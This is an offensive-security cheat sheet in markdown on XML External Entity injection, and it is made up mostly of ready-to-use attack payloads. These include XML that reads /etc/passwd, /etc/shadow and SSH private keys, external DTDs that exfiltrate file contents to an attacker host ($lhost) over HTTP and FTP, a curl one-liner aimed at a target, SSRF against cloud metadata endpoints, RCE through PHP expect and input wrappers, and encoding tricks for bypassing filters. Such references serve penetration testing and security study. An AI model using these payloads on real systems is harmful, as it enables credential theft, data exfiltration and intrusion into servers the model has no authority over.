Skip to content

7.7.XXE.md

Latest commit

 

History

History
372 lines (278 loc) · 6.25 KB

7.7.XXE.md

File metadata and controls

372 lines (278 loc) · 6.25 KB

XML External Entity (XXE) Injection

Table of Contents

Basic XXE

Quick Check (One-liner)

# Test XXE with basic payload
echo '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>' | curl -X POST -d @- http://$rhost/api -H "Content-Type: application/xml"

Classic XXE Payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

Parameter Entity

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://$lhost/evil.dtd">
  %xxe;
]>
<root>
  <data>&send;</data>
</root>

File Disclosure

Linux Files

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/shadow">
]>
<foo>&xxe;</foo>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///home/user/.ssh/id_rsa">
]>
<foo>&xxe;</foo>

Windows Files

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<foo>&xxe;</foo>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
]>
<foo>&xxe;</foo>

PHP Wrapper (Base64 Encoded Source)

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<foo>&xxe;</foo>

Blind XXE

Out-of-Band Detection

External DTD File (evil.dtd on attacker server)

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://$lhost/?data=%file;'>">
%eval;
%exfiltrate;

Payload

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://$lhost/evil.dtd">
  %xxe;
]>
<foo>test</foo>

Base64 Exfiltration

External DTD (evil.dtd)

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://$lhost/?data=%file;'>">
%eval;
%exfiltrate;

DNS Exfiltration

<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://xxe.$lhost/">
  %xxe;
]>

FTP Exfiltration

External DTD

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'ftp://$lhost:21/%file;'>">
%eval;
%exfiltrate;

Start FTP Server

python3 -m pyftpdlib -p 21 -w

Error-Based XXE

External DTD (error.dtd)

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Error-Based XXE Payload

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://$lhost/error.dtd">
  %xxe;
]>
<foo>test</foo>

Error message will contain file contents.

XXE to SSRF

Internal Service Probing

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://127.0.0.1:22/">
]>
<foo>&xxe;</foo>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://127.0.0.1:8080/">
]>
<foo>&xxe;</foo>

Cloud Metadata

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<foo>&xxe;</foo>

Internal Network Scanning

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://192.168.1.1/">
]>
<foo>&xxe;</foo>

XXE to RCE

Expect Wrapper (PHP)

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "expect://id">
]>
<foo>&xxe;</foo>

PHP Input Wrapper

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://input">
]>
<foo>&xxe;</foo>

POST body: <?php system('id'); ?>

Jar Protocol (Java)

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "jar:http://$lhost/evil.jar!/payload.class">
]>
<foo>&xxe;</foo>

Filter Bypass

UTF-7 Encoding

<?xml version="1.0" encoding="UTF-7"?>
+ADw-!DOCTYPE foo +AFs-
  +ADw-!ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI-+AD4-
+AF0-+AD4-
+ADw-foo+AD4-+ACY-xxe+ADsAPA-/foo+AD4-

UTF-16 Encoding

iconv -f UTF-8 -t UTF-16 payload.xml > payload16.xml

HTML Entities in DTD

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:&#x2f;&#x2f;&#x2f;etc&#x2f;passwd">
]>
<foo>&xxe;</foo>

Without Spaces

<!DOCTYPE%20foo%20[<!ENTITY%20xxe%20SYSTEM%20"file:///etc/passwd">]><foo>&xxe;</foo>

CDATA Section

<!DOCTYPE foo [
  <!ENTITY % start "<![CDATA[">
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % end "]]>">
  <!ENTITY % all "<!ENTITY fileContent '%start;%file;%end;'>">
]>
<foo>&fileContent;</foo>

XInclude Attack

When you cannot modify DOCTYPE

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

XXE via File Upload

SVG

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="100" height="100">
  <text x="10" y="20">&xxe;</text>
</svg>

DOCX/XLSX/PPTX

  1. Unzip the file
  2. Modify [Content_Types].xml or other XML files
  3. Inject XXE payload
  4. Rezip

Payload Cheat Sheet

Payload Description
<!ENTITY xxe SYSTEM "file:///etc/passwd"> Read local file
<!ENTITY xxe SYSTEM "http://$lhost/"> SSRF/OOB
<!ENTITY xxe SYSTEM "php://filter/..."> PHP wrapper
<!ENTITY xxe SYSTEM "expect://id"> RCE via expect
<!ENTITY % xxe SYSTEM "http://$lhost/evil.dtd"> External DTD
<!ENTITY xxe SYSTEM "http://169.254.169.254/"> Cloud metadata

📚 See Also

Related Web Attacks

Related Topics